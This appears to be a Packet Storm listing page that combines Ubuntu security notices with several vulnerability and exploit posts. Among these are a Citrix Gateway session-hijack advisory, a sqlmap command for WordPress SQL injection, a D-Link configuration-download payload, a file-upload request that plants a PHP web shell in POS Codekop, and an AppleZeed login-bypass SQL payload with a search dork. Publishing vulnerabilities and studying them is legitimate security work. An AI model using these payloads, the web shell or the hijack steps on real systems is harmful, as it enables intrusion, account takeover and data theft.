Ubuntu Security Notice 6199-1 - It was discovered that PHP incorrectly handled certain Digest authentication for SOAP. An attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6199-1  
July 03, 2023

php7.4, php8.1 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

PHP could be made to expose sensitive information.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain Digest  
authentication for SOAP. An attacker could possibly use this issue  
to expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libapache2-mod-php7.4           8.1.12-1ubuntu4.2  
  libapache2-mod-php8.0           8.1.12-1ubuntu4.2  
  libapache2-mod-php8.1           8.1.12-1ubuntu4.2  
  php8.1                          8.1.12-1ubuntu4.2  
  php8.1-cgi                      8.1.12-1ubuntu4.2  
  php8.1-cli                      8.1.12-1ubuntu4.2  
  php8.1-soap                     8.1.12-1ubuntu4.2

Ubuntu 22.10:  
  libapache2-mod-php7.4           8.1.7-1ubuntu3.5  
  libapache2-mod-php8.0           8.1.7-1ubuntu3.5  
  libapache2-mod-php8.1           8.1.7-1ubuntu3.5  
  php8.1                          8.1.7-1ubuntu3.5  
  php8.1-cgi                      8.1.7-1ubuntu3.5  
  php8.1-cli                      8.1.7-1ubuntu3.5  
  php8.1-soap                     8.1.7-1ubuntu3.5

Ubuntu 22.04 LTS:  
  libapache2-mod-php7.4           8.1.2-1ubuntu2.13  
  libapache2-mod-php8.0           8.1.2-1ubuntu2.13  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.13  
  php8.1                          8.1.2-1ubuntu2.13  
  php8.1-cgi                      8.1.2-1ubuntu2.13  
  php8.1-cli                      8.1.2-1ubuntu2.13  
  php8.1-soap                     8.1.2-1ubuntu2.13  
  php8.1-sqlite3                  8.1.2-1ubuntu2.13

Ubuntu 20.04 LTS:  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.19  
  php7.4                          7.4.3-4ubuntu2.19  
  php7.4-cgi                      7.4.3-4ubuntu2.19  
  php7.4-cli                      7.4.3-4ubuntu2.19  
  php7.4-soap                     7.4.3-4ubuntu2.19

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6199-1  
  CVE-2023-3247

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.12-1ubuntu4.2  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.7-1ubuntu3.5  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.13  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.19

Ubuntu Security Notice USN-6199-1

Ubuntu Security Notice 6198-1 - It was discovered that GNU Screen was not properly checking user identifiers before sending certain signals to target processes. If GNU Screen was installed as setuid or setgid, a local attacker could possibly use this issue to cause a denial of service on a target application.

    ==========================================================================Ubuntu Security Notice USN-6198-1July 03, 2023screen vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)- Ubuntu 14.04 LTS (Available with Ubuntu Pro)Summary:GNU Screen could be made to crash applications if it received speciallycrafted input.Software Description:- screen: terminal multiplexer with VT100/ANSI terminal emulationDetails:It was discovered that GNU Screen was not properly checking useridentifiers before sending certain signals to target processes. If GNUScreen was installed as setuid or setgid, a local attacker could possiblyuse this issue to cause a denial of service on a target application.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS (Available with Ubuntu Pro):   screen                          4.6.2-1ubuntu1.1+esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):   screen                          4.3.1-2ubuntu0.1+esm1Ubuntu 14.04 LTS (Available with Ubuntu Pro):   screen 4.1.0~20120320gitdb59704-9ubuntu0.1~esm3In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6198-1   CVE-2023-24626

Ubuntu Security Notice USN-6198-1

Citrix Gateway and Cloud MFA suffers from an insufficient session validation vulnerability.

Document Title:  
===============  
Citrix Gateway & Cloud MFA - Insufficient Session Validation Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2324

Vulnerability Magazine:https://www.vulnerability-db.com/?q=articles/2023/07/03/citrix-gateway-cloud-mfa-insufficient-session-validation-vulnerability

Security Video: (Cloud)  
https://www.youtube.com/watch?v=vObgOpGpCSM

Security Video: (OnPrem)  
https://www.youtube.com/watch?v=RFjRgiW2OWE

Release Date:  
=============  
2023-07-03

Vulnerability Laboratory ID (VL-ID):  
====================================  
2324

Common Vulnerability Scoring System:  
====================================  
5

Vulnerability Class:  
====================  
Insufficient Session Validation

Current Estimated Price:  
========================  
2.000€ - 3.000€

Product & Service Introduction:  
===============================  
Cloud Software Group's NetScaler and NetScaler Gateway, previously better known as Citrix ADC and Citrix Gateway (and hereafter referred to as Citrix *)  
provides secure and reliable access to web applications, enterprise applications and corporate data.

"Citrix Gateway consolidates remote access infrastructure to provide single sign-on for all apps, whether in a data center, in a cloud, or  
if the apps are deployed as SaaS apps. It allows users to access any app from any device through a single URL. Citrix Gateway is easy to  
deploy and easy to manage. The most typical deployment configuration is to place the Citrix Gateway appliance in the DMZ. You can install  
multiple Citrix Gateway appliances on the network for more complex deployments."

(Copy of the Homepage:https://docs.citrix.com/de-de/citrix-gateway.html  )

"Many companies restrict website access to valid users only, and control the level of access permitted to each user.  
The authentication, authorization, and auditing feature allows a site administrator to manage access controls with the NetScaler appliance  
instead of managing these controls separately for each application. Doing authentication on the appliance also permits sharing this  
information across all websites within the same domain that are protected by the appliance."

(Copy of the Homepage:https://docs.netscaler.com/en-us/citrix-adc/current-release/aaa-tm.html  &https://citrix.cloud.com  &https://cloud.citrix.com)

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a web vulnerability in the official Citrix Gateway (ADC/NetScaler) 13.0 & 13.1 web-application, Cloud and AAA Feature.

Affected Product(s):  
===================  
Manufacturer:     
Citrix/Cloud Software Group

Products:      
Citrix ADC/NetScaler 13.0 & 13.1  
Citrix Gateway/Netscaler Gateway 13.0 & 13.1  
Citrix Cloud Services Website  
Possibly also earlier versions

Vulnerability Disclosure Timeline:  
==================================  
2023-03-27: Researcher Notification & Coordination (Security Researcher)  
2023-04-24: Vendor Notification (Security Department)  
2023-04-26: Vendor Response/Feedback #1 (Security Department)  
2023-04-27: Vendor Response/Feedback #2 (Security Department)  
2023-05-04: Vendor Response/Feedback #2 (Security Department)  
2023-**-**: Security Acknowledgements (Security Department)  
2023-**-**: Vendor Fix/Patch by Check (Service Developer Team)  
2023-07-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
No User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
An insufficient session validation web vulnerability was discovered in the Citrix Gateway (ADC/NetScaler) 13.0 & 13.1 web-application, Cloud and AAA Feature.  
The security vulnerability allows remote attackers to bypass the mfa function by hijacking the session data of an active user (non expired session) to followup  
with further compromising attacks.

The insufficient session validation vulnerability is located in the Citrix Gateway login without web-application firewall (waf) and the Citrix Gateway login with  
web-application firewall (waf). Attackers can access the applications behind the Citrix Gateway without authentication after compromising a client by extract of a  
specific generated access cookie.In the onprem version of Citrix ADC and Citrix Gateway it is only required to hijack the NSC_AAAC cookie for unauthorized access  
through the Citrix Gateway. To gain access to a AAA protected webservices it is required to hijack the NSC_TMAS cookie.

The security issue is not only exploitable in the onprem version of Citrix ADC and Citrix Gateway, but as well in the Citrix Cloud Services Website.  
For Citrix Cloud Services Website its required to hijack as well the regionSessionId, customer and sessionId to exploit the vulnerability.  
Any kind of authentication (Single and Multifactor) does not prevent the exploitation of this vulnerability.

Citrix does recomment that customers should use the web-application firewall to protect the session data but finally the protection  
mechanism does not secure against thus type of insufficient session validation attacks.

Successful exploitation of the vulnerability leads to session hijacking, unauthorized access to applications content and  
compromise of the accessable infrastructure behind, through the Citrix Gateway and AAA.

Vulnerable Function(s):  
[+] NSC_AAAC (Cookie)  
[+] NSC_TMAS (Cookie)

Affected Module(s):  
[+] Citrix Gateway  
[+] AAAC

Proof of Concept (PoC):  
=======================  
The insufficent session validation web vulnerability can be exploited by remote attackers without user interaction with remote device access (exp. client compromise).  
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability  
1.  Open the url for the Citrix Gateway  
2.  Open the browser internal web developer tools  
3.  Login to the Citrix Gateway and enter the login data  
4.  Successful login and it can be observed that an additional cookie is written (NSC_AAAC)  
5.  On a second unknown test computer system the citrix gateway is opened (browser)  
6.  Open the browser internal web developer tools  
7.  Creation of a new cookie for the page with the name, value and path of the cookie of the other session  
8.  Reload of the login page or login to the login screen with random values (Input of content is important to use the logon)  
9.  Successful login by the second device and take over the active non expired session  
10. Successful reproduce of the vulnerability!

Note: To reproduce the same issue on the Citrix Cloud Services Website you have to add 3 cookies  
- sessionId  
- regionSessionId  
- customer

The video victim shows: Victim  
- Victim accesseshttps://eu.cloud.com  and is redirected tohttps://accounts.cloud.com  for authentication  
- After successful authentication with MFA, he is redirected tohttps://citrix.cloud.com  
- Victim now sees the customers/tenants he has access to. He chooses <censored> EU Demo Cloud 2. The tenant ID (and content of the cookie "customer") is displayed. He is redirected tohttps://eu.cloud.com  
- The victim now sees the services provided for the tenant  
- The cookies necessary for the attacker are visible (sessionID, regionSessionID, customer)  
- The video ends

The video attacker shows: Attacker  
- The attacker callshttps://eu.cloud.com  and is redirected tohttps://accounts.cloud.com  for authentication. So he is not yet authenticated and does not have access to the EU Cloud yet  
- The attacker creates the cookies with the pilfered values for the respective domain. (Name: sessionID, Value: JtLzXIU9OeKy_2TkwYyssg, Path: /, Domain: eu.cloud.com), (Name: customer, Value: f0t66hjbpi0o, Path: /, Domain: .cloud.com) The regionSessionID was not used because they are the same for the victim and attacker forhttps://eu.cloud.com). If the initial call was in a different region than the Customer, the value would need to be changed  
- The attacker callshttps://eu.cloud.com  again and is now in the victim's tenant (CCID/customer cookie: f0t66hjbpi0o). The attacker now sees the services provided to the tenant  
- Through the menu, the attacker sees that he would have access to all kind of Citrix Cloud Infrastructure Services (for example Citrix DaaS, Citrix Gateway Service, Citrix Workspace Configuration, Citrix Identity & Access Management, Citrix Endpoint Management, Citrix ShareFile), licensing, support tickets and co  
- The video ends

Security Risk:  
==============  
The security risk of the citrix gateway and cloud services vulnerability in the mfa portal authentication module is estimated as medium.

Credits & Authors:  
==================  
Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther  
Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
EVOLUTION SECURITY GMBH  
FRIEDRICH-EBERT-STRAßE 10  
34117 KASSEL - HESSEN  
DEUTSCHLAND (DE)

Citrix Gateway And Cloud MFA Insufficient Session Validation

Qualcomm Adreno/KGSL suffers from an issue where code in user-writable mapping is executed in non-protected mode.

Qualcomm Adreno/KGSL Insecure Execution

Ubuntu Security Notice 6197-1 - It was discovered that OpenLDAP was not properly performing bounds checks when executing functions related to LDAP URLs. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6197-1  
July 03, 2023

openldap vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

OpenLDAP could be made to crash if it received specially crafted  
input.

Software Description:  
- openldap: Lightweight Directory Access Protocol

Details:

It was discovered that OpenLDAP was not properly performing bounds checks  
when executing functions related to LDAP URLs. An attacker could possibly  
use this issue to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   slapd                           2.4.45+dfsg-1ubuntu1.11+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   slapd                           2.4.42+dfsg-2ubuntu3.13+esm2

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   slapd                           2.4.31-1+nmu2ubuntu8.5+esm6

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6197-1  
   CVE-2023-2953

Ubuntu Security Notice USN-6197-1

WordPress WP AutoComplete Search plugin versions 1.0.4 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi# Date: 30/06/2023# Exploit Author: Matin nouriyan (matitanium)# Version: <= 1.0.4# CVE: CVE-2022-4297Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/# Tested on: Kali linux---------------------------------------The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,leading to an unauthenticated SQL injection--------------------------------------How to Reproduce this Vulnerability:1. Install WP AutoComplete <= 1.0.4 2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests3. Find requests belong to WP AutoComplete like step 54. Start sqlmap and exploit 5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q

WordPress WP AutoComplete Search 1.0.4 SQL Injection

D-Link DAP-1325 suffers from an insecure direct object reference vulnerability.

    # Exploit Title: D-Link DAP-1325 - Broken Access Control# Date: 27-06-2023# Exploit Author: ieduardogoncalves# Contact : twitter.com/0x00dia# Vendor : www.dlink.com# Version: Hardware version: A1 # Firmware version: 1.01# Tested on:All Platforms1) DescriptionSecurity vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.IN MY CASE,Tested repeater IP: http://192.168.0.21/Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=02) Proof of ConceptStep 1: Go toRepeater Login Page : http://192.168.0.21/Step 2:Add the payload to URL.Payload:http://{ip}/cgi-bin/ExportSettings.shPayload:https://github.com/eeduardogoncalves/exploit

D-Link DAP-1325 Insecure Direct Object Reference

POS Codekop version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)# Date: 25-05-2023# Exploit Author: yuyudhn# Vendor Homepage: https://www.codekop.com/# Software Link: https://github.com/fauzan1892/pos-kasir-php# Version: 2.0# Tested on: Linux# CVE: CVE-2023-36348# Vulnerability description: The application does not sanitize the filenameparameter when sending data to /fungsi/edit/edit.php?gambar=user. Anattacker can exploit this issue by uploading a PHP file and accessing it,leading to Remote Code Execution.# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/# Proof of Concept:1. Login to POS Codekop dashboard.2. Go to profile settings.3. Upload PHP script through Upload Profile Photo.Burp Log Example:```POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1Host: localhostContent-Length: 8934Cache-Control: max-age=0sec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""**Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-User: ?1**Sec-Fetch-Dest: documentReferer: http://localhost/research/pos-kasir-php/index.php?page=userAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhvConnection: close------WebKitFormBoundarymVBHqH4m6KgKBnpaContent-Disposition: form-data; name="foto"; filename="asuka-rce.php"Content-Type: image/jpegÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>ÿÛC-----------------------------```PHP Web Shell location:http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php

POS Codekop 2.0 Shell Upload

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**AppleZeed CMS 2.0 SQL Injection**

Posted Jul 4, 2023

Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection

SHA-256 | b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b

Download | Favorite | View

**AppleZeed CMS 2.0 SQL Injection**

    ====================================================================================================================================| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | | # Vendor    : https://applezeed.com                                                                                              |  | # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] admin path = /backend/[+] http://TARGET/backend/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,564)
*   Arbitrary (16,123)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,205)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,331)
*   DoS (23,296)
*   Encryption (2,364)
*   Exploit (51,438)
*   File Inclusion (4,203)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,743)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,414)
*   Magazine (586)
*   Overflow (12,629)
*   Perl (1,423)
*   PHP (5,136)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,592)
*   Root (3,574)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,862)
*   Shell (3,170)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,261)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,656)
*   Web (9,602)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,795)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,783)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,075)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,716)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

AppleZeed CMS 2.0 SQL Injection

ApPHP MicroCMS version 1.0.1 re-embeds arbitrary content from the client into web pages.

====================================================================================================================================  
| # Title     : ApPHP MicroCMS v1.0.1 Host header attack Vulnerability                                                             |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro)                                                                                        |  
| # Vendor    : http://www.apphp.com/php-microcms/                                                                                 |    
| # Dork      : ApPHP MicroCMS © ApPHP Admin Login                                                                                 |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine

[+] Vulnerability description :

    An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways.   
    Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP).   
    Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to:   
    <link href="http://_SERVER['HOST']"    (Joomla)  
    ...and append secret keys and tokens to links containing it:   
    <a href="http://_SERVER['HOST']?token=topsecret">  (Django, Gallery, others)  
    ....and even directly import scripts from it:   
    <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4">  (Various)

    [+] This vulnerability affects : /phpmicrocms/index.php. 

[+] Attack details : 

    Host header evilhostK8kAwlbV.com was reflected inside a A tag (href attribute).

[+] The impact of this vulnerability :

    An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways.

[+] How to fix this vulnerability :

    The web application should use the SERVER_NAME instead of the Host header. It should also create a dummy vhost that catches all requests with unrecognized Host headers. This can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. Consult references for detailed information.

====Greetings to :=========================================================================================================================  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |  
===========================================================================================================================================

Source

Packet Storm